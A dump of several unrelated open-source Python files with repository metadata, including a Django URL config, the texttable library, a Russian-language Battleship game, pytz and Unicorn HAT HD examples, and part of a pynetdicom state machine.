path('', include('pages.urls')),
path('listings/', include('listings.urls')),
path('accounts/', include('accounts.urls')),
path('contacts/', include('contacts.urls')),
path('admin/', admin.site.urls),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# FROM PREVIOUS APP CODE:
# Modified to be more explicit. Helps others who are reading our code. We're only adding this on when
# we're in DEBUG mode.
# if settings.DEBUG:
# urlpatterns += static(settings.MEDIA_URL,
# document_root=settings.MEDIA_ROOT)
# Original snippet from django's docs for media:
# from django.conf import settings
# from django.conf.urls.static import static
# urlpatterns = [
# # ... the rest of your URLconf goes here ...
# ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"gaylon.alfano@gmail.com"
] |
gaylon.alfano@gmail.com
|
921a24a58fdec22a688db14ecfd1318b1a710cf3
|
7ec7ec203b91f389d66a457a2ceda5768653925e
|
/assig10/texttable.py
|
55192e1aa3f3fdf8145f68f4f4b7f82275b2e0ab
|
[] |
no_license
|
BogdanDumbravean/Fundamentals-of-Programming-FP
|
5fb8c2980ca6e133d9850826795f71682becd57e
|
6bada4bdb2e526a758642b7c947f958c58d32d04
|
refs/heads/master
| 2022-04-11T03:38:11.945899
| 2020-03-18T14:07:03
| 2020-03-18T14:07:03
| 245,674,541
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,261
|
py
|
# texttable - module for creating simple ASCII tables
# Copyright (C) 2003-2018 Gerome Fournier <jef(at)foutaise.org>
"""module for creating simple ASCII tables
Example:
table = Texttable()
table.set_cols_align(["l", "r", "c"])
table.set_cols_valign(["t", "m", "b"])
table.add_rows([["Name", "Age", "Nickname"],
["Mr\\nXavier\\nHuon", 32, "Xav'"],
["Mr\\nBaptiste\\nClement", 1, "Baby"],
["Mme\\nLouise\\nBourgeau", 28, "Lou\\n\\nLoue"]])
print table.draw() + "\\n"
table = Texttable()
table.set_deco(Texttable.HEADER)
table.set_cols_dtype(['t', # text
'f', # float (decimal)
'e', # float (exponent)
'i', # integer
'a']) # automatic
table.set_cols_align(["l", "r", "r", "r", "l"])
table.add_rows([["text", "float", "exp", "int", "auto"],
["abcd", "67", 654, 89, 128.001],
["efghijk", 67.5434, .654, 89.6, 12800000000000000000000.00023],
["lmn", 5e-78, 5e-78, 89.4, .000000000000128],
["opqrstu", .023, 5e+78, 92., 12800000000000000000000]])
print table.draw()
Result:
+----------+-----+----------+
| Name | Age | Nickname |
+==========+=====+==========+
| Mr | | |
| Xavier | 32 | |
| Huon | | Xav' |
+----------+-----+----------+
| Mr | | |
| Baptiste | 1 | |
| Clement | | Baby |
+----------+-----+----------+
| Mme | | Lou |
| Louise | 28 | |
| Bourgeau | | Loue |
+----------+-----+----------+
text float exp int auto
===========================================
abcd 67.000 6.540e+02 89 128.001
efgh 67.543 6.540e-01 90 1.280e+22
ijkl 0.000 5.000e-78 89 0.000
mnop 0.023 5.000e+78 92 1.280e+22
"""
from __future__ import division
__all__ = ["Texttable", "ArraySizeError"]
__author__ = 'Gerome Fournier <jef(at)foutaise.org>'
__license__ = 'MIT'
__version__ = '1.5.0'
__credits__ = """\
Jeff Kowalczyk:
- textwrap improved import
- comment concerning header output
Anonymous:
- add_rows method, for adding rows in one go
Sergey Simonenko:
- redefined len() function to deal with non-ASCII characters
Roger Lew:
- columns datatype specifications
Brian Peterson:
- better handling of unicode errors
Frank Sachsenheim:
- add Python 2/3-compatibility
Maximilian Hils:
- fix minor bug for Python 3 compatibility
frinkelpi:
- preserve empty lines
"""
import sys
import unicodedata
# define a text wrapping function to wrap some text
# to a specific width:
# - use cjkwrap if available (better CJK support)
# - fallback to textwrap otherwise
try:
import cjkwrap
def textwrapper(txt, width):
return cjkwrap.wrap(txt, width)
except ImportError:
try:
import textwrap
def textwrapper(txt, width):
return textwrap.wrap(txt, width)
except ImportError:
sys.stderr.write("Can't import textwrap module!\n")
raise
# define a function to calculate the rendering width of a unicode character
# - use wcwidth if available
# - fallback to unicodedata information otherwise
try:
import wcwidth
def uchar_width(c):
"""Return the rendering width of a unicode character
"""
return max(0, wcwidth.wcwidth(c))
except ImportError:
def uchar_width(c):
"""Return the rendering width of a unicode character
"""
if unicodedata.east_asian_width(c) in 'WF':
return 2
elif unicodedata.combining(c):
return 0
else:
return 1
from functools import reduce
if sys.version_info >= (3, 0):
unicode_type = str
bytes_type = bytes
else:
#unicode_type = unicode
bytes_type = str
def obj2unicode(obj):
"""Return a unicode representation of a python object
"""
if isinstance(obj, unicode_type):
return obj
elif isinstance(obj, bytes_type):
try:
return unicode_type(obj, 'utf-8')
except UnicodeDecodeError as strerror:
sys.stderr.write("UnicodeDecodeError exception for string '%s': %s\n" % (obj, strerror))
return unicode_type(obj, 'utf-8', 'replace')
else:
return unicode_type(obj)
def len(iterable):
"""Redefining len here so it will be able to work with non-ASCII characters
"""
if isinstance(iterable, bytes_type) or isinstance(iterable, unicode_type):
return sum([uchar_width(c) for c in obj2unicode(iterable)])
else:
return iterable.__len__()
class ArraySizeError(Exception):
"""Exception raised when specified rows don't fit the required size
"""
def __init__(self, msg):
self.msg = msg
Exception.__init__(self, msg, '')
def __str__(self):
return self.msg
class FallbackToText(Exception):
"""Used for failed conversion to float"""
pass
class Texttable:
BORDER = 1
HEADER = 1 << 1
HLINES = 1 << 2
VLINES = 1 << 3
def __init__(self, max_width=80):
"""Constructor
- max_width is an integer, specifying the maximum width of the table
- if set to 0, size is unlimited, therefore cells won't be wrapped
"""
self.set_max_width(max_width)
self._precision = 3
self._deco = Texttable.VLINES | Texttable.HLINES | Texttable.BORDER | \
Texttable.HEADER
self.set_chars(['-', '|', '+', '='])
self.reset()
def reset(self):
"""Reset the instance
- reset rows and header
"""
self._hline_string = None
self._row_size = None
self._header = []
self._rows = []
return self
def set_max_width(self, max_width):
"""Set the maximum width of the table
- max_width is an integer, specifying the maximum width of the table
- if set to 0, size is unlimited, therefore cells won't be wrapped
"""
self._max_width = max_width if max_width > 0 else False
return self
def set_chars(self, array):
"""Set the characters used to draw lines between rows and columns
- the array should contain 4 fields:
[horizontal, vertical, corner, header]
- default is set to:
['-', '|', '+', '=']
"""
if len(array) != 4:
raise ArraySizeError("array should contain 4 characters")
array = [ x[:1] for x in [ str(s) for s in array ] ]
(self._char_horiz, self._char_vert,
self._char_corner, self._char_header) = array
return self
def set_deco(self, deco):
"""Set the table decoration
- 'deco' can be a combinaison of:
Texttable.BORDER: Border around the table
Texttable.HEADER: Horizontal line below the header
Texttable.HLINES: Horizontal lines between rows
Texttable.VLINES: Vertical lines between columns
All of them are enabled by default
- example:
Texttable.BORDER | Texttable.HEADER
"""
self._deco = deco
return self
def set_header_align(self, array):
"""Set the desired header alignment
- the elements of the array should be either "l", "c" or "r":
* "l": column flushed left
* "c": column centered
* "r": column flushed right
"""
self._check_row_size(array)
self._header_align = array
return self
def set_cols_align(self, array):
"""Set the desired columns alignment
- the elements of the array should be either "l", "c" or "r":
* "l": column flushed left
* "c": column centered
* "r": column flushed right
"""
self._check_row_size(array)
self._align = array
return self
def set_cols_valign(self, array):
"""Set the desired columns vertical alignment
- the elements of the array should be either "t", "m" or "b":
* "t": column aligned on the top of the cell
* "m": column aligned on the middle of the cell
* "b": column aligned on the bottom of the cell
"""
self._check_row_size(array)
self._valign = array
return self
def set_cols_dtype(self, array):
"""Set the desired columns datatype for the cols.
- the elements of the array should be either a callable or any of
"a", "t", "f", "e" or "i":
* "a": automatic (try to use the most appropriate datatype)
* "t": treat as text
* "f": treat as float in decimal format
* "e": treat as float in exponential format
* "i": treat as int
* a callable: should return formatted string for any value given
- by default, automatic datatyping is used for each column
"""
self._check_row_size(array)
self._dtype = array
return self
def set_cols_width(self, array):
"""Set the desired columns width
- the elements of the array should be integers, specifying the
width of each column. For example:
[10, 20, 5]
"""
self._check_row_size(array)
try:
array = list(map(int, array))
if reduce(min, array) <= 0:
raise ValueError
except ValueError:
sys.stderr.write("Wrong argument in column width specification\n")
raise
self._width = array
return self
def set_precision(self, width):
"""Set the desired precision for float/exponential formats
- width must be an integer >= 0
- default value is set to 3
"""
if not type(width) is int or width < 0:
raise ValueError('width must be an integer greater then 0')
self._precision = width
return self
def header(self, array):
"""Specify the header of the table
"""
self._check_row_size(array)
self._header = list(map(obj2unicode, array))
return self
def add_row(self, array):
"""Add a row in the rows stack
- cells can contain newlines and tabs
"""
self._check_row_size(array)
if not hasattr(self, "_dtype"):
self._dtype = ["a"] * self._row_size
cells = []
for i, x in enumerate(array):
cells.append(self._str(i, x))
self._rows.append(cells)
return self
def add_rows(self, rows, header=True):
"""Add several rows in the rows stack
- The 'rows' argument can be either an iterator returning arrays,
or a by-dimensional array
- 'header' specifies if the first row should be used as the header
of the table
"""
# nb: don't use 'iter' on by-dimensional arrays, to get a
# usable code for python 2.1
if header:
if hasattr(rows, '__iter__') and hasattr(rows, 'next'):
self.header(rows.next())
else:
self.header(rows[0])
rows = rows[1:]
for row in rows:
self.add_row(row)
return self
def draw(self):
"""Draw the table
- the table is returned as a whole string
"""
if not self._header and not self._rows:
return
self._compute_cols_width()
self._check_align()
out = ""
if self._has_border():
out += self._hline()
if self._header:
out += self._draw_line(self._header, isheader=True)
if self._has_header():
out += self._hline_header()
length = 0
for row in self._rows:
length += 1
out += self._draw_line(row)
if self._has_hlines() and length < len(self._rows):
out += self._hline()
if self._has_border():
out += self._hline()
return out[:-1]
@classmethod
def _to_float(cls, x):
if x is None:
raise FallbackToText()
try:
return float(x)
except (TypeError, ValueError):
raise FallbackToText()
@classmethod
def _fmt_int(cls, x, **kw):
"""Integer formatting class-method.
- x will be float-converted and then used.
"""
return str(int(round(cls._to_float(x))))
@classmethod
def _fmt_float(cls, x, **kw):
"""Float formatting class-method.
- x parameter is ignored. Instead kw-argument f being x float-converted
will be used.
- precision will be taken from `n` kw-argument.
"""
n = kw.get('n')
return '%.*f' % (n, cls._to_float(x))
@classmethod
def _fmt_exp(cls, x, **kw):
"""Exponential formatting class-method.
- x parameter is ignored. Instead kw-argument f being x float-converted
will be used.
- precision will be taken from `n` kw-argument.
"""
n = kw.get('n')
return '%.*e' % (n, cls._to_float(x))
@classmethod
def _fmt_text(cls, x, **kw):
"""String formatting class-method."""
return obj2unicode(x)
@classmethod
def _fmt_auto(cls, x, **kw):
"""auto formatting class-method."""
f = cls._to_float(x)
if abs(f) > 1e8:
fn = cls._fmt_exp
else:
if f - round(f) == 0:
fn = cls._fmt_int
else:
fn = cls._fmt_float
return fn(x, **kw)
def _str(self, i, x):
"""Handles string formatting of cell data
i - index of the cell datatype in self._dtype
x - cell data to format
"""
FMT = {
'a':self._fmt_auto,
'i':self._fmt_int,
'f':self._fmt_float,
'e':self._fmt_exp,
't':self._fmt_text,
}
n = self._precision
dtype = self._dtype[i]
try:
if callable(dtype):
return dtype(x)
else:
return FMT[dtype](x, n=n)
except FallbackToText:
return self._fmt_text(x)
def _check_row_size(self, array):
"""Check that the specified array fits the previous rows size
"""
if not self._row_size:
self._row_size = len(array)
elif self._row_size != len(array):
raise ArraySizeError("array should contain %d elements" \
% self._row_size)
def _has_vlines(self):
"""Return a boolean, if vlines are required or not
"""
return self._deco & Texttable.VLINES > 0
def _has_hlines(self):
"""Return a boolean, if hlines are required or not
"""
return self._deco & Texttable.HLINES > 0
def _has_border(self):
"""Return a boolean, if border is required or not
"""
return self._deco & Texttable.BORDER > 0
def _has_header(self):
"""Return a boolean, if header line is required or not
"""
return self._deco & Texttable.HEADER > 0
def _hline_header(self):
"""Print header's horizontal line
"""
return self._build_hline(True)
def _hline(self):
"""Print an horizontal line
"""
if not self._hline_string:
self._hline_string = self._build_hline()
return self._hline_string
def _build_hline(self, is_header=False):
"""Return a string used to separated rows or separate header from
rows
"""
horiz = self._char_horiz
if (is_header):
horiz = self._char_header
# compute cell separator
s = "%s%s%s" % (horiz, [horiz, self._char_corner][self._has_vlines()],
horiz)
# build the line
l = s.join([horiz * n for n in self._width])
# add border if needed
if self._has_border():
l = "%s%s%s%s%s\n" % (self._char_corner, horiz, l, horiz,
self._char_corner)
else:
l += "\n"
return l
def _len_cell(self, cell):
"""Return the width of the cell
Special characters are taken into account to return the width of the
cell, such like newlines and tabs
"""
cell_lines = cell.split('\n')
maxi = 0
for line in cell_lines:
length = 0
parts = line.split('\t')
for part, i in zip(parts, list(range(1, len(parts) + 1))):
length = length + len(part)
if i < len(parts):
length = (length//8 + 1) * 8
maxi = max(maxi, length)
return maxi
def _compute_cols_width(self):
"""Return an array with the width of each column
If a specific width has been specified, exit. If the total of the
columns width exceed the table desired width, another width will be
computed to fit, and cells will be wrapped.
"""
if hasattr(self, "_width"):
return
maxi = []
if self._header:
maxi = [ self._len_cell(x) for x in self._header ]
for row in self._rows:
for cell,i in zip(row, list(range(len(row)))):
try:
maxi[i] = max(maxi[i], self._len_cell(cell))
except (TypeError, IndexError):
maxi.append(self._len_cell(cell))
ncols = len(maxi)
content_width = sum(maxi)
deco_width = 3*(ncols-1) + [0,4][self._has_border()]
if self._max_width and (content_width + deco_width) > self._max_width:
""" content too wide to fit the expected max_width
let's recompute maximum cell width for each cell
"""
if self._max_width < (ncols + deco_width):
raise ValueError('max_width too low to render data')
available_width = self._max_width - deco_width
newmaxi = [0] * ncols
i = 0
while available_width > 0:
if newmaxi[i] < maxi[i]:
newmaxi[i] += 1
available_width -= 1
i = (i + 1) % ncols
maxi = newmaxi
self._width = maxi
def _check_align(self):
"""Check if alignment has been specified, set default one if not
"""
if not hasattr(self, "_header_align"):
self._header_align = ["c"] * self._row_size
if not hasattr(self, "_align"):
self._align = ["l"] * self._row_size
if not hasattr(self, "_valign"):
self._valign = ["t"] * self._row_size
def _draw_line(self, line, isheader=False):
"""Draw a line
Loop over a single cell length, over all the cells
"""
line = self._splitit(line, isheader)
space = " "
out = ""
for i in range(len(line[0])):
if self._has_border():
out += "%s " % self._char_vert
length = 0
for cell, width, align in zip(line, self._width, self._align):
length += 1
cell_line = cell[i]
fill = width - len(cell_line)
if isheader:
align = self._header_align[length - 1]
if align == "r":
out += fill * space + cell_line
elif align == "c":
out += (int(fill/2) * space + cell_line \
+ int(fill/2 + fill%2) * space)
else:
out += cell_line + fill * space
if length < len(line):
out += " %s " % [space, self._char_vert][self._has_vlines()]
out += "%s\n" % ['', space + self._char_vert][self._has_border()]
return out
def _splitit(self, line, isheader):
"""Split each element of line to fit the column width
Each element is turned into a list, result of the wrapping of the
string to the desired width
"""
line_wrapped = []
for cell, width in zip(line, self._width):
array = []
for c in cell.split('\n'):
if c.strip() == "":
array.append("")
else:
array.extend(textwrapper(c, width))
line_wrapped.append(array)
max_cell_lines = reduce(max, list(map(len, line_wrapped)))
for cell, valign in zip(line_wrapped, self._valign):
if isheader:
valign = "t"
if valign == "m":
missing = max_cell_lines - len(cell)
cell[:0] = [""] * int(missing / 2)
cell.extend([""] * int(missing / 2 + missing % 2))
elif valign == "b":
cell[:0] = [""] * (max_cell_lines - len(cell))
else:
cell.extend([""] * (max_cell_lines - len(cell)))
return line_wrapped
if __name__ == '__main__':
table = Texttable()
table.set_cols_align(["l", "r", "c"])
table.set_cols_valign(["t", "m", "b"])
table.add_rows([["Name", "Age", "Nickname"],
["Mr\nXavier\nHuon", 32, "Xav'"],
["Mr\nBaptiste\nClement", 1, "Baby"],
["Mme\nLouise\nBourgeau", 28, "Lou\n \nLoue"]])
print(table.draw() + "\n")
table = Texttable()
table.set_deco(Texttable.HEADER)
table.set_cols_dtype(['t', # text
'f', # float (decimal)
'e', # float (exponent)
'i', # integer
'a']) # automatic
table.set_cols_align(["l", "r", "r", "r", "l"])
table.add_rows([["text", "float", "exp", "int", "auto"],
["abcd", "67", 654, 89, 128.001],
["efghijk", 67.5434, .654, 89.6, 12800000000000000000000.00023],
["lmn", 5e-78, 5e-78, 89.4, .000000000000128],
["opqrstu", .023, 5e+78, 92., 12800000000000000000000]])
print(table.draw())
|
[
"noreply@github.com"
] |
BogdanDumbravean.noreply@github.com
|
c315a859c67d982c211b1cc6a911fac71aa21def
|
7bf5d17cd67df4f29e7aca2601d1c4a3d20826dc
|
/BattleShip_War.py
|
1e28f3408ba7b7ff0eb051a44ad50fa472318e13
|
[] |
no_license
|
Fasto84/Battleship_war
|
d7d9661b13be8722b9218fa8e735b2a94ec4bafb
|
f252642f9175741b49af7e182a862a4a1f40d8f6
|
refs/heads/master
| 2023-05-07T12:51:38.260236
| 2021-05-31T18:31:37
| 2021-05-31T18:31:37
| 372,573,411
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,006
|
py
|
from random import randint
class Dot: #класс точка
def __init__(self, x, y):
self.x = x
self.y = y
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def __repr__(self):
return f"({self.x}, {self.y})"
class Error(Exception): #класс исключений
pass
class BoardOutException(Error):
def __str__(self):
return "Выстрел за предел поля!"
class UsedCellException(Error):
def __str__(self):
return "В эту клетку уже стреляли"
class CannotPlaceShip(Error):
def __str__(self):
return "Нет подходящего места для корабля!"
class BoardWrongShipException(Error):
pass
class Ship: #класс корабль
def __init__(self, bow, l, o):
self.bow = bow
self.l = l
self.o = o
self.lives = l
@property
def dots(self):
ship_dots = []
for i in range(self.l):
cur_x = self.bow.x
cur_y = self.bow.y
if self.o == 0:
cur_x += i
elif self.o == 1:
cur_y += i
ship_dots.append(Dot(cur_x, cur_y))
return ship_dots
def shooten(self, shot):
return shot in self.dots
class Board: #класс игровое поле
def __init__(self, hid = False, size = 10):
self.size = size
self.hid = hid
self.count = 0
self.field = [["0"] * size for _ in range(size)]
self.busy = []
self.ships = []
def add_ship(self, ship):
for d in ship.dots:
if self.out(d) or d in self.busy:
raise BoardWrongShipException()
for d in ship.dots:
self.field[d.x][d.y] = "■"
self.busy.append(d)
self.ships.append(ship)
self.contour(ship)
def contour(self, ship, verb=False): #Контур корабля и добавление его на доску
near = [
(-1, -1), (-1, 0), (-1, 1),
(0, -1), (0, 0), (0, 1),
(1, -1), (1, 0), (1, 1)
]
for d in ship.dots:
for dx, dy in near:
cur = Dot(d.x + dx, d.y + dy)
if not (self.out(cur)) and cur not in self.busy:
if verb:
self.field[cur.x][cur.y] = "."
self.busy.append(cur)
def __str__(self):
res = ""
res += " | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 |"
for i, row in enumerate(self.field):
res += f"\n{i + 1} | " + " | ".join(row) + " |"
if self.hid:
res = res.replace("■", "O")
return res
def out(self, d):
return not((0<= d.x < self.size) and (0<= d.y < self.size))
def shot(self, d):
if self.out(d):
raise BoardOutException()
if d in self.busy:
raise UsedCellException()
self.busy.append(d)
for ship in self.ships:
if d in ship.dots:
ship.lives -= 1
self.field[d.x][d.y] = "X"
if ship.lives == 0:
self.count += 1
self.contour(ship, verb = True)
print("Корабль взорван!")
return False
else:
print("Пробитие!")
return True
self.field[d.x][d.y] = "."
print("Мимо!")
return False
def begin(self):
self.busy = []
class Player:
def __init__(self, board, enemy):
self.board = board
self.enemy = enemy
def ask(self):
raise NotImplementedError()
def move(self):
while True:
try:
target = self.ask()
repeat = self.enemy.shot(target)
return repeat
except Error as e:
print(e)
class AI(Player):
def ask(self):
d = Dot(randint(0, 5), randint(0, 5))
print(f"Ход компьютера: {d.x+1} {d.y+1}")
return d
class User(Player):
def ask(self):
while True:
cords = input("Ваш ход: ").split()
if len(cords) != 2:
print(" Введите 2 координаты! ")
continue
x, y = cords
if not(x.isdigit()) or not(y.isdigit()):
print(" Введите числа! ")
continue
x, y = int(x), int(y)
return Dot(x-1, y-1)
class Game:
def __init__(self, size=10):
self.size = size
pl = self.random_board()
co = self.random_board()
co.hid = True
self.ai = AI(co, pl)
self.us = User(pl, co)
def random_board(self):
board = None
while board is None:
board = self.random_place()
return board
def random_place(self):
lens = [4, 3, 3, 2, 2, 2, 1, 1, 1, 1]
board = Board(size = self.size)
attempts = 0
for l in lens:
while True:
attempts += 1
if attempts > 2000:
return None
ship = Ship(Dot(randint(0, self.size), randint(0, self.size)), l, randint(0, 1))
try:
board.add_ship(ship)
break
except BoardWrongShipException:
pass
board.begin()
return board
def greet(self):
print("-------------------")
print(" Приветсвуем вас ")
print(" в игре ")
print(" морской бой ")
print("-------------------")
print(" формат ввода: x y ")
print(" x - номер строки ")
print(" y - номер столбца ")
def loop(self):
num = 0
while True:
print("-" * 20)
print("Доска игрока:")
print(self.us.board)
print("-" * 20)
print("Доска компьютера:")
print(self.ai.board)
if num % 2 == 0:
print("-" * 20)
print("Ходит игрок!")
repeat = self.us.move()
else:
print("-" * 20)
print("Ходит компьютер!")
repeat = self.ai.move()
if repeat:
num -= 1
if self.ai.board.count == 7:
print("-" * 20)
print("Игрок выиграл!")
break
if self.us.board.count == 7:
print("-" * 20)
print("Компьютер выиграл!")
break
num += 1
def start(self):
self.greet()
self.loop()
g = Game()
g.start()
|
[
"email@example.ru"
] |
email@example.ru
|
d4b166d403d26f0ae688d9697bd1ff6f749166e3
|
5a3acab867bc5c67ffe1792b2159d72a041cfe1c
|
/datetime/src/datetime-pytz.py
|
b7b4be1e6097b036102662d83fd8d82aa06fdd55
|
[
"MIT"
] |
permissive
|
WoodenBackpack/book-python
|
4adb5078c4f4557e690feebd827d3d409c67b266
|
c4ed9ff322277be1432ee5e624c249b8e69fd594
|
refs/heads/master
| 2020-03-22T13:11:24.356768
| 2018-07-07T13:47:30
| 2018-07-07T13:47:30
| 140,089,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
import pytz
utc = pytz.utc
print(utc.zone)
#'UTC'
eastern = pytz.timezone('US/Eastern')
print(eastern.zone)
# 'US/Eastern'
amsterdam = pytz.timezone('Europe/Warsaw')
print(amsterdam.zone)
# 'Europe/Warsaw'
|
[
"matt@astrotech.io"
] |
matt@astrotech.io
|
891bf1124c3f58f352cb380c666eac1259fc66f8
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2601/60749/243951.py
|
bf17d6881be56a15b5a1bfed49e86a7a0e227c88
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 197
|
py
|
row=int(input())
col=int(input())
k=int(input())
res=[]
for i in range(1,row+1):
for j in range(1, col+1):
res.append(i*j)
result=list(set(res))
result=sorted(result)
print(result[k-1])
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
beea2bf331c9369881069c2908c758b4ffc41cdb
|
22be44dce81f6c0ac9f891e1661118299e4feaf1
|
/labs/src/A.1.HelloSetup/complete/show-png.py
|
3447dbebff1d4e074de7624a99b82885f3f90c76
|
[] |
no_license
|
KathiW/python_foundations
|
18a1b24a140e8f3e482a1581986c9bafd64565ff
|
02b6d5b2532fb9c71a497ab1fe506a7d70bc13e1
|
refs/heads/main
| 2023-02-19T10:47:02.391016
| 2021-01-20T13:00:51
| 2021-01-20T13:00:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,431
|
py
|
import os
import time
from sys import exit
try:
from PIL import Image
except ImportError:
exit('This script requires the pillow module\nInstall with: sudo pip install pillow')
import unicornhathd
print("""Unicorn HAT HD: Show a PNG image!
This basic example shows use of the Python Pillow library.
The tiny 16x16 bosses in lofi.png are from Oddball:
http://forums.tigsource.com/index.php?topic=8834.0
Licensed under Creative Commons Attribution-Noncommercial-Share Alike 3.0
Unported License.
Press Ctrl+C to exit!
""")
unicornhathd.rotation(90)
unicornhathd.brightness(0.6)
width, height = unicornhathd.get_shape()
img_file = os.path.join(os.path.dirname(__file__), 'lofi.png')
img = Image.open(img_file)
try:
while True:
for o_x in range(int(img.size[0] / width)):
for o_y in range(int(img.size[1] / height)):
valid = False
for x in range(width):
for y in range(height):
pixel = img.getpixel(((o_x * width) + y, (o_y * height) + x))
r, g, b = int(pixel[0]), int(pixel[1]), int(pixel[2])
if r or g or b:
valid = True
unicornhathd.set_pixel(x, y, r, g, b)
if valid:
unicornhathd.show()
time.sleep(0.5)
except KeyboardInterrupt:
unicornhathd.off()
|
[
"you@example.com"
] |
you@example.com
|
fd3eca812ddae876ca3d95e67b572793f2390c59
|
4fe440d600ba46a9133b06c3f9f0bd867734b24b
|
/source/netdicom/fsm.py
|
7cf74c368ead35a28485b93769f2881321e4c461
|
[
"MIT"
] |
permissive
|
stultus/pynetdicom-forked-from-official
|
921a365551d796201cd1b023e87ec4b82896de71
|
f6e9d670b339523fb6e77298289e865e8ad6530e
|
refs/heads/master
| 2020-04-09T10:19:01.967976
| 2014-11-19T08:42:05
| 2014-11-19T08:42:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,678
|
py
|
#
# Copyright (c) 2012 Patrice Munger
# This file is part of pynetdicom, released under a modified MIT license.
# See the file license.txt included with this distribution, also
# available at http://pynetdicom.googlecode.com
#
# Implementation of the OSI Upper Layer Services
# DICOM, Part 8, Section 7
import socket
import PDU
import time
import DULparameters
# Finite State machine action definitions
import logging
logger = logging.getLogger('netdicom.FSM')
def AE_1(provider):
# Issue TRANSPORT CONNECT request primitive to local transport service
provider.RemoteClientSocket = socket.socket(
socket.AF_INET, socket.SOCK_STREAM)
provider.RemoteClientSocket.connect(
provider.primitive.CalledPresentationAddress)
def AE_2(provider):
# Send A-ASSOCIATE-RQ PDU
provider.pdu = PDU.A_ASSOCIATE_RQ_PDU()
provider.pdu.FromParams(provider.primitive)
provider.RemoteClientSocket.send(provider.pdu.Encode())
def AE_3(provider):
# Issue A-ASSOCIATE confirmation (accept) primitive
provider.ToServiceUser.put(provider.primitive)
def AE_4(provider):
# Issue A-ASSOCIATE confirmation (reject) primitive and close transport
# connection
provider.ToServiceUser.put(provider.primitive)
provider.RemoteClientSocket.close()
provider.RemoteClientSocket = None
def AE_5(provider):
# Issue connection response primitive start ARTIM timer
# Don't need to send this primitive.
provider.Timer.Start()
def AE_6(provider):
# Stop ARTIM timer and if A-ASSOCIATE-RQ acceptable by service provider
# - Issue A-ASSOCIATE indication primitive
provider.Timer.Stop()
# Accept
provider.SM.NextState('Sta3')
provider.ToServiceUser.put(provider.primitive)
# otherwise????
def AE_7(provider):
# Send A-ASSOCIATE-AC PDU
provider.pdu = PDU.A_ASSOCIATE_AC_PDU()
provider.pdu.FromParams(provider.primitive)
provider.RemoteClientSocket.send(provider.pdu.Encode())
def AE_8(provider):
# Send A-ASSOCIATE-RJ PDU and start ARTIM timer
provider.pdu = PDU.A_ASSOCIATE_RJ_PDU()
# not sure about this ...
if provider.primitive.Diagnostic is not None:
provider.primitive.ResultSource = provider.primitive.Diagnostic.source
#else:
# provider.primitive.Diagnostic = 1
# provider.primitive.ResultSource = 2
provider.pdu.FromParams(provider.primitive)
provider.RemoteClientSocket.send(provider.pdu.Encode())
def DT_1(provider):
# Send P-DATA-TF PDU
provider.pdu = PDU.P_DATA_TF_PDU()
provider.pdu.FromParams(provider.primitive)
provider.primitive = None
provider.RemoteClientSocket.send(provider.pdu.Encode())
def DT_2(provider):
# Send P-DATA indication primitive
provider.ToServiceUser.put(provider.primitive)
def AR_1(provider):
# Send A-RELEASE-RQ PDU
provider.pdu = PDU.A_RELEASE_RQ_PDU()
provider.pdu.FromParams(provider.primitive)
provider.RemoteClientSocket.send(provider.pdu.Encode())
def AR_2(provider):
# Send A-RELEASE indication primitive
provider.ToServiceUser.put(provider.primitive)
def AR_3(provider):
# Issue A-RELEASE confirmation primitive and close transport connection
provider.ToServiceUser.put(provider.primitive)
provider.RemoteClientSocket.close()
provider.RemoteClientSocket = None
def AR_4(provider):
# Issue A-RELEASE-RP PDU and start ARTIM timer
provider.pdu = PDU.A_RELEASE_RP_PDU()
provider.pdu.FromParams(provider.primitive)
provider.RemoteClientSocket.send(provider.pdu.Encode())
provider.Timer.Start()
def AR_5(provider):
# Stop ARTIM timer
provider.Timer.Stop()
def AR_6(provider):
# Issue P-DATA indication
provider.ToServiceUser.put(provider.primitive)
def AR_7(provider):
# Issue P-DATA-TF PDU
provider.pdu = PDU.P_DATA_TF_PDU()
provider.pdu.FromParams(provider.primitive)
provider.RemoteClientSocket.send(provider.pdu.Encode())
def AR_8(provider):
# Issue A-RELEASE indication (release collision)
provider.ToServiceUser.put(provider.primitive)
if provider.requestor == 1:
provider.SM.NextState('Sta9')
else:
provider.SM.NextState('Sta10')
def AR_9(provider):
# Send A-RELEASE-RP PDU
provider.pdu = PDU.A_RELEASE_RP_PDU()
provider.pdu.FromParams(provider.primitive)
provider.RemoteClientSocket.send(provider.pdu.Encode())
def AR_10(provider):
# Issue A-RELEASE confirmation primitive
provider.ToServiceUser.put(provider.primitive)
def AA_1(provider):
# Send A-ABORT PDU (service-user source) and start (or restart
# if already started) ARTIM timer.
provider.pdu = PDU.A_ABORT_PDU()
# CHECK THIS ...
provider.pdu.AbortSource = 1
provider.pdu.ReasonDiag = 0
provider.pdu.FromParams(provider.primitive)
provider.RemoteClientSocket.send(provider.pdu.Encode())
provider.Timer.Restart()
def AA_2(provider):
# Stop ARTIM timer if running. Close transport connection.
provider.Timer.Stop()
provider.RemoteClientSocket.close()
provider.RemoteClientSocket = None
def AA_3(provider):
# If (service-user initiated abort):
# - Issue A-ABORT indication and close transport connection.
# Otherwise (service-provider initiated abort):
# - Issue A-P-ABORT indication and close transport connection.
# This action is triggered by the reception of an A-ABORT PDU
provider.ToServiceUser.put(provider.primitive)
provider.RemoteClientSocket.close()
provider.RemoteClientSocket = None
def AA_4(provider):
# Issue A-P-ABORT indication primitive.
provider.primitive = DULparameters.A_ABORT_ServiceParameters()
